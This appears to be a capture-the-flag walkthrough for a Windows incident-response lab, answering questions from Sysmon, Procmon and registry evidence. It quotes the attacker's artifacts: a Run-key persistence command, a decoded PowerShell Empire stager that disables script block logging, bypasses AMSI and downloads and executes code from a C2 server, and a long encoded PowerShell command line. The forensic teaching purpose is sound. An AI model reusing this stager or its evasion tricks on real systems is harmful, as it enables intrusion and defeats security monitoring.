Investigating Windows 3.x
What is the registry key with the encoded payload? (full path)
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/*' | Sort-Object TimeCreated
# First way
# https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
# EventID 13 is registry value set
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=13' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl
TimeCreated : 1/21/2021 5:08:13 PM
ProviderName : Microsoft-Windows-Sysmon
Id : 13
Message : Registry value set:
RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
EventType: SetValue
UtcTime: 2021-01-22 01:08:13.468
ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
ProcessId: 2684
Image: C:\Windows\Explorer.EXE
TargetObject:
HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp
HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"
# Second way
You can view /Desktop/sysmon.evtx by importing in event viewer.
Registry value set:
RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
EventType: SetValue
UtcTime: 2021-01-22 01:08:13.468
ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
ProcessId: 2684
Image: C:\Windows\Explorer.EXE
TargetObject: HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"
# View Registry in registry editor
HKCU:Software\Microsoft\Windows\CurrentVersion\DebugWhat is the rule name for this run key generated by Sysmon?
Registry value set:
RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
EventType: SetValue
UtcTime: 2021-01-22 01:08:13.468
ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
ProcessId: 2684
Image: C:\Windows\Explorer.EXE
TargetObject: HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"
T1547.001What tactics is classified with this MITRE ATT&CK ID?
# https://attack.mitre.org/techniques/T1547/
Persistence, Privilege EscalationWhat was UTC time for the Sysmon event?
Registry value set:
RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
EventType: SetValue
UtcTime: 2021-01-22 01:08:13.468
ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
ProcessId: 2684
Image: C:\Windows\Explorer.EXE
TargetObject: HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"
2021-01-22 01:08:13.468What was the Sysmon Event ID? Event Type? (answer, answer)
# https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
13, SetValueDecode the payload. What service will the payload attempt start?
% cat encode.txt | base64 -d > decode.txt
% cat decode.txt
sc.exe start Fax;
$FTPServer = "localhost";
$FTPPort = "9299";
$tcpConnection = New-Object System.Net.Sockets.TcpClient($FTPServer, $FTPPort);
$tcpStream = $tcpConnection.GetStream();
$reader = New-Object System.IO.StreamReader($tcpStream);
$writer = New-Object System.IO.StreamWriter($tcpStream);
$writer.AutoFlush = $true;
FaxThe payload attempts to open a local port. What is the port number?
9299What process does the payload attempt to terminate?
kill (Get-Process FXSSVC).Id -force; Remove-Item -path 'C:\Windows\System32\ualapi.dll';IF($PSVErSIONTABlE.PSVErsIoN.MAJOr -GE 3){$fff6=[ref].ASsemBLy.GetTypE('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');If($ffF6){$B9BE=$fFf6.GETValUe($NULL);If($B9bE['ScriptB'+'lockLogging']){$B9Be['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$b9Be['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAl=[COLlECtiOnS.GEnErIc.DIcTIoNARy[STrinG,SyStEM.OBjecT]]::nEw();$Val.ADD('EnableScriptB'+'lockLogging',0);$VAL.ADd('EnableScriptBlockInvocationLogging',0);$b9bE['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}ElSE{[SCRipTBlock]."GeTFie`ld"('signatures','N'+'onPublic,Static').SETVaLue($nULl,(New-OBjECt COLlectIoNs.GEnerIC.HaSHSeT[sTrIng]))}$Ref=[Ref].ASSEmbly.GeTType('System.Management.Automation.Amsi'+'Utils');$REf.GEtFIELD('amsiInitF'+'ailed','NonPublic,Static').SetVaLUE($nuLl,$TruE);};[SystEm.NET.SErVICEPoIntMAnAgeR]::ExPEcT100COnTInue=0;$27CE=NeW-OBJEct SYsTEm.NEt.WEBClIeNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TExt.ENCoDiNg]::UNiCoDe.GETString([COnVeRt]::FrOMBAsE64STrINg('aAB0AHQAcAA6AC8ALwAzADQALgAyADQANQAuADEAMgA4AC4AMQA2ADEAOgA5ADAAMAAxAA==')));$t='/admin/get.php';$27CE.HeadErs.ADD('User-Agent',$u);$27Ce.PrOxY=[SySTEm.NET.WEBREqUesT]::DefAUltWEBPROXY;$27ce.PROXy.CrEDENTIals = [SyStem.NEt.CREdEnTiAlCAChE]::DEFAULTNeTwoRKCrEdenTiALS;$Script:Proxy = $27ce.Proxy;$K=[SystEm.TeXT.EnCoDiNg]::ASCII.GeTBYTes('awXUDkit<oV9JcROL{%gQ.|3nHqMpA/l');$R={$D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$27CE.HeaDers.AdD("Cookie","RjMeek=ZmQLHacMBXrLcB+VElvLcwO26EY=");$DatA=$27Ce.DOwnloAdDAtA($Ser+$T);$iv=$DaTA[0..3];$DatA=$dAtA[4..$Data.lENgth];-jOIN[CHAr[]](& $R $dAtA ($IV+$K))|IEX
FXSSVCWhat DLL file does the payload attempt to remove? (full path)
Remove-Item -path 'C:\Windows\System32\ualapi.dll'
ualapi.dllWhat is the Windows Event ID associated with this service?
# Hint said me Printer
Application and Services Logs > Microsoft > Windows > PrinterService > Admin
823What is listed as the New Default Printer?
The default printer was changed to PrintDemon. See the event user data for context information.
PrintDemonWhat process is associated with this event?
# Find ualapi.dll in Procmon64
spoolsv.exeWhat is the parent PID for the above process?
620Examine the other processes. What is the PID of the process running the encoded payload?
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=1' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl
TimeCreated : 1/21/2021 5:05:45 PM
ProviderName : Microsoft-Windows-Sysmon
Id : 1
Message : Process Create:
RuleName: technique_id=T1059.001,technique_name=PowerShell
UtcTime: 2021-01-22 01:05:45.938
ProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
ProcessId: 3088
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBGACgAJAB
QAFMAVgBFAHIAUwBJAE8ATgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAG8ATgAuAE0AQQBKAE8AcgAgAC0ARwBFACAAMwApAHsAJAB
mAGYAZgA2AD0AWwByAGUAZgBdAC4AQQBTAHMAZQBtAEIATAB5AC4ARwBlAHQAVAB5AHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgB
hAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdABpAGwAcwAnACkALgAiAEcAZQB0AEYAaQBlAGAAbABkACIAKAA
nAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMAeQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbAB
pAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAGYAKAAkAGYAZgBGADYAKQB7ACQAQgA5AEIARQA9ACQAZgBGAGYANgAuAEcARQBUAFYAYQB
sAFUAZQAoACQATgBVAEwATAApADsASQBmACgAJABCADkAYgBFAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwB
pAG4AZwAnAF0AKQB7ACQAQgA5AEIAZQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwB
FAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABiADkAQgBlAFsAJwB
TAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbAB
vAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAdgBBAGwAPQBbAEMATwBMAGwARQBDAHQAaQB
PAG4AUwAuAEcARQBuAEUAcgBJAGMALgBEAEkAYwBUAEkAbwBOAEEAUgB5AFsAUwBUAHIAaQBuAEcALABTAHkAUwB0AEUATQAuAE8AQgB
qAGUAYwBUAF0AXQA6ADoAbgBFAHcAKAApADsAJABWAGEAbAAuAEEARABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwA
nAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABWAEEATAAuAEEARABkACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdAB
CAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAGIAOQBiAEUAWwAnAEgASwBFAFkAXwB
MAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwB
mAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaABlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwB
nAGkAbgBnACcAXQA9ACQAVgBBAGwAfQBFAGwAUwBFAHsAWwBTAEMAUgBpAHAAVABCAGwAbwBjAGsAXQAuACIARwBlAFQARgBpAGUAYAB
sAGQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA
uAFMARQBUAFYAYQBMAHUAZQAoACQAbgBVAEwAbAAsACgATgBlAHcALQBPAEIAagBFAEMAdAAgAEMATwBMAGwAZQBjAHQASQBvAE4AcwA
uAEcARQBuAGUAcgBJAEMALgBIAGEAUwBIAFMAZQBUAFsAcwBUAHIASQBuAGcAXQApACkAfQAkAFIAZQBmAD0AWwBSAGUAZgBdAC4AQQB
TAFMARQBtAGIAbAB5AC4ARwBlAFQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwB
tAGEAdABpAG8AbgAuAEEAbQBzAGkAJwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBFAGYALgBHAEUAdABGAEkARQBMAEQAKAAnAGEAbQB
zAGkASQBuAGkAdABGACcAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB
0AFYAYQBMAFUARQAoACQAbgB1AEwAbAAsACQAVAByAHUARQApADsAfQA7AFsAUwB5AHMAdABFAG0ALgBOAEUAVAAuAFMARQByAFYASQB
DAEUAUABvAEkAbgB0AE0AQQBuAEEAZwBlAFIAXQA6ADoARQB4AFAARQBjAFQAMQAwADAAQwBPAG4AVABJAG4AdQBlAD0AMAA7ACQAMgA
3AEMARQA9AE4AZQBXAC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUAbQAuAE4ARQB0AC4AVwBFAEIAQwBsAEkAZQBOAFQAOwAkAHUAPQA
nAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgB
pAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKAB
bAFQARQB4AHQALgBFAE4AQwBvAEQAaQBOAGcAXQA6ADoAVQBOAGkAQwBvAEQAZQAuAEcARQBUAFMAdAByAGkAbgBnACgAWwBDAE8AbgB
WAGUAUgB0AF0AOgA6AEYAcgBPAE0AQgBBAHMARQA2ADQAUwBUAHIASQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA
4AEEATAB3AEEAegBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE0AUQBBADIAQQB
EAEUAQQBPAGcAQQA1AEEARABBAEEATQBBAEEAeABBAEEAPQA9ACcAKQApACkAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgB
wAGgAcAAnADsAJAAyADcAQwBFAC4ASABlAGEAZABFAHIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA
7ACQAMgA3AEMAZQAuAFAAcgBPAHgAWQA9AFsAUwB5AFMAVABFAG0ALgBOAEUAVAAuAFcARQBCAFIARQBxAFUAZQBzAFQAXQA6ADoARAB
lAGYAQQBVAGwAdABXAEUAQgBQAFIATwBYAFkAOwAkADIANwBjAGUALgBQAFIATwBYAHkALgBDAHIARQBEAEUATgBUAEkAYQBsAHMAIAA
9ACAAWwBTAHkAUwB0AGUAbQAuAE4ARQB0AC4AQwBSAEUAZABFAG4AVABpAEEAbABDAEEAQwBoAEUAXQA6ADoARABFAEYAQQBVAEwAVAB
OAGUAVAB3AG8AUgBLAEMAcgBFAGQAZQBuAFQAaQBBAEwAUwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAAyADcAYwB
lAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AEUAbQAuAFQAZQBYAFQALgBFAG4AQwBvAEQAaQBOAGcAXQA6ADoAQQBTAEMASQB
JAC4ARwBlAFQAQgBZAFQAZQBzACgAJwBhAHcAWABVAEQAawBpAHQAPABvAFYAOQBKAGMAUgBPAEwAewAlAGcAUQAuAHwAMwBuAEgAcQB
NAHAAQQAvAGwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBHAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA
1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwA
kAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJAB
JACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJAB
IAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgBYAG8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJAB
IAF0AKQAlADIANQA2AF0AfQB9ADsAJAAyADcAQwBFAC4ASABlAGEARABlAHIAcwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgB
SAGoATQBlAGUAawA9AFoAbQBRAEwASABhAGMATQBCAFgAcgBMAGMAQgArAFYARQBsAHYATABjAHcATwAyADYARQBZAD0AIgApADsAJAB
EAGEAdABBAD0AJAAyADcAQwBlAC4ARABPAHcAbgBsAG8AQQBkAEQAQQB0AEEAKAAkAFMAZQByACsAJABUACkAOwAkAGkAdgA9ACQARAB
hAFQAQQBbADAALgAuADMAXQA7ACQARABhAHQAQQA9ACQAZABBAHQAQQBbADQALgAuACQARABhAHQAYQAuAGwARQBOAGcAdABoAF0AOwA
tAGoATwBJAE4AWwBDAEgAQQByAFsAXQBdACgAJgAgACQAUgAgACQAZABBAHQAQQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
CurrentDirectory: C:\Users\Administrator\
User: WIN-Q5JJRDM876J\Administrator
LogonGuid: {786593ca-776c-6009-5ea8-030000000000}
LogonId: 0x3A85E
TerminalSessionId: 1
IntegrityLevel: High
Hashes: SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6
E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
ParentProcessGuid: {786593ca-24a3-600a-e400-000000000300}
ParentProcessId: 3624
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Decode the payload. What is the a visible partial path?
;$t='/admin/get.php';
/admin/get.phpThis is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable? (answer, answer)
# https://github.com/EmpireProject/Empire
# https://www.powershellempire.com/?page_id=110
DefaultProfile, EmpireWhat other file paths are you likely to find in the logs? (answer, answer)
/news.php, /login/process.phpWhat is the MITRE ATT&CK URI for the attack framework?
# Google 'MITRE /news.php, /login/process.php attack'
https://attack.mitre.org/software/S0363/What was the FQDN of the attacker machine that the suspicious process connected to?
% nslookup 34.245.128.161
161.128.245.34.in-addr.arpa name = ec2-34-245-128-161.eu-west-1.compute.amazonaws.com.
Authoritative answers can be found from:
ec2-34-245-128-161.eu-west-1.compute.amazonaws.comWhat other process connected to the attacker machine?
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=3' | Sort-Object TimeCreated | fl
TimeCreated : 1/21/2021 5:05:50 PM
ProviderName : Microsoft-Windows-Sysmon
Id : 3
Message : Network connection detected:
RuleName: technique_id=T1059.001,technique_name=PowerShell
UtcTime: 2021-01-21 19:52:53.946
ProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
ProcessId: 3088
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User: WIN-Q5JJRDM876J\Administrator
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 192.168.10.146
SourceHostname: -
SourcePort: 49736
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 34.245.128.161
DestinationHostname: -
DestinationPort: 9001
DestinationPortName: -
TimeCreated : 1/21/2021 5:07:10 PM
ProviderName : Microsoft-Windows-Sysmon
Id : 3
Message : Network connection detected:
RuleName: technique_id=T1043,technique_name=Commonly Used Port
UtcTime: 2021-01-21 19:54:13.834
ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
ProcessId: 2684
Image: C:\Windows\explorer.exe
User: WIN-Q5JJRDM876J\Administrator
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 192.168.10.146
SourceHostname: -
SourcePort: 49737
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 34.245.128.161
DestinationHostname: -
DestinationPort: 9001
DestinationPortName: -
explorer.exeWhat is the PID for this process?
2684What was the path for the first image loaded for the process identified in Q's 19 & 20?
# Filter with procmon
Operation = Load Image
PID = 2684
c:\Windows\System32\mscoree.dllWhat Symon event were generated between these 2 processes? What is its associated Event ID #? (answer, answer)
# First under stand the question. It generate 2 process
# 2 process = 1(sysmonid1 process create), 2(sysmonid2 registry value create)
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=1' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | flWhat is the UTC time for the first event between these 2 processes?
PS C:\Users\Administrator\Desktop> Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=1' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl
TimeCreated : 1/21/2021 5:05:45 PM
ProviderName : Microsoft-Windows-Sysmon
Id : 1
Message : Process Create:
RuleName: technique_id=T1059.001,technique_name=PowerShell
UtcTime: 2021-01-22 01:05:45.938
ProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
ProcessId: 3088
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAUwBJAE8ATgBUAEEAQgBsAEUALgBQAFMAVgBFAHIA
cwBJAG8ATgAuAE0AQQBKAE8AcgAgAC0ARwBFACAAMwApAHsAJABmAGYAZgA2AD0AWwByAGUAZgBdAC4AQQBTAHMAZQBtAEIATAB5AC4ARwBlAHQAVAB5AHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhA
GcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdABpAGwAcwAnACkALgAiAEcAZQB0AEYAaQBlAGAAbABkACIAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMAeQBTAGUAdA
B0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAGYAKAAkAGYAZgBGADYAKQB7ACQAQgA5AEIARQA9ACQAZgBGAGYANgAuAEcARQBUAFYAYQBsAFU
AZQAoACQATgBVAEwATAApADsASQBmACgAJABCADkAYgBFAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAQgA5AEIAZQBbACcAUwBjAHIAaQBwAHQAQgAn
ACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABiADkAQgBlAFsAJwBTAGMAc
gBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD
0AMAB9ACQAdgBBAGwAPQBbAEMATwBMAGwARQBDAHQAaQBPAG4AUwAuAEcARQBuAEUAcgBJAGMALgBEAEkAYwBUAEkAbwBOAEEAUgB5AFsAUwBUAHIAaQBuAEcALABTAHkAUwB0AEUATQAuAE8AQgBqAGUAYwB
UAF0AXQA6ADoAbgBFAHcAKAApADsAJABWAGEAbAAuAEEARABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABWAEEATAAuAEEA
RABkACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAGIAOQBiAEUAWwAnAEgASwBFAFkAXwBMAE8AQwBBA
EwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaABlAGwAbABcAFMAYw
ByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQA9ACQAVgBBAGwAfQBFAGwAUwBFAHsAWwBTAEMAUgBpAHAAVABCAGwAbwBjAGsAXQAuACIARwBlAFQARgBpAGUAYABsAGQAIgAoACc
AcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAHUAZQAoACQAbgBVAEwAbAAsACgATgBlAHcALQBPAEIAagBF
AEMAdAAgAEMATwBMAGwAZQBjAHQASQBvAE4AcwAuAEcARQBuAGUAcgBJAEMALgBIAGEAUwBIAFMAZQBUAFsAcwBUAHIASQBuAGcAXQApACkAfQAkAFIAZQBmAD0AWwBSAGUAZgBdAC4AQQBTAFMARQBtAGIAb
AB5AC4ARwBlAFQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAJwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBFAG
YALgBHAEUAdABGAEkARQBMAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGACcAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBMAFUARQA
oACQAbgB1AEwAbAAsACQAVAByAHUARQApADsAfQA7AFsAUwB5AHMAdABFAG0ALgBOAEUAVAAuAFMARQByAFYASQBDAEUAUABvAEkAbgB0AE0AQQBuAEEAZwBlAFIAXQA6ADoARQB4AFAARQBjAFQAMQAwADAA
QwBPAG4AVABJAG4AdQBlAD0AMAA7ACQAMgA3AEMARQA9AE4AZQBXAC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUAbQAuAE4ARQB0AC4AVwBFAEIAQwBsAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsA
GEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQ
BjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AHQALgBFAE4AQwBvAEQAaQBOAGcAXQA6ADoAVQBOAGkAQwBvAEQAZQAuAEcARQBUAFMAdAByAGkAbgBnACgAWwBDAE8AbgBWAGUAUgB0AF0AOgA6AEY
AcgBPAE0AQgBBAHMARQA2ADQAUwBUAHIASQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAegBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABFAEEATQBn
AEEANABBAEMANABBAE0AUQBBADIAQQBEAEUAQQBPAGcAQQA1AEEARABBAEEATQBBAEEAeABBAEEAPQA9ACcAKQApACkAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgBwAGgAcAAnADsAJAAyADcAQ
wBFAC4ASABlAGEAZABFAHIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAMgA3AEMAZQAuAFAAcgBPAHgAWQA9AFsAUwB5AFMAVABFAG0ALgBOAEUAVAAuAFcARQBCAF
IARQBxAFUAZQBzAFQAXQA6ADoARABlAGYAQQBVAGwAdABXAEUAQgBQAFIATwBYAFkAOwAkADIANwBjAGUALgBQAFIATwBYAHkALgBDAHIARQBEAEUATgBUAEkAYQBsAHMAIAA9ACAAWwBTAHkAUwB0AGUAbQA
uAE4ARQB0AC4AQwBSAEUAZABFAG4AVABpAEEAbABDAEEAQwBoAEUAXQA6ADoARABFAEYAQQBVAEwAVABOAGUAVAB3AG8AUgBLAEMAcgBFAGQAZQBuAFQAaQBBAEwAUwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIA
bwB4AHkAIAA9ACAAJAAyADcAYwBlAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AEUAbQAuAFQAZQBYAFQALgBFAG4AQwBvAEQAaQBOAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAFQAZQBzA
CgAJwBhAHcAWABVAEQAawBpAHQAPABvAFYAOQBKAGMAUgBPAEwAewAlAGcAUQAuAHwAMwBuAEgAcQBNAHAAQQAvAGwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBHAHMAOwAkAFMAPQAwAC4ALg
